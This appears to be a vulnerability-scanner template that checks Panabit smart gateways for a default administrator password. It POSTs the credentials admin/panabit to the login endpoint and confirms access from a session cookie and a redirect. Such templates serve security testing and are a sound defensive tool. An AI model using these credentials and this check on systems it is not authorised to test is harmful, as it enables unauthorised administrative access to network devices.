漏洞描述
app="Panabit-智能网关"
id: panabit-gateway-default-password
info:
name: Panabit Gateway Default Password
author: Print1n(https://github.com/Print1n)
severity: high
verified: true
description: app="Panabit-智能网关"
tags: panabit,defaultpassword
created: 2023/10/30
rules:
r0:
request:
method: POST
path: /login/userverify.cgi
body: username=admin&password=panabit
expression: |
response.headers["set-cookie"].contains("paonline_admin") &&
response.body.ibcontains(b"URL=/index.htm")
expression: r0()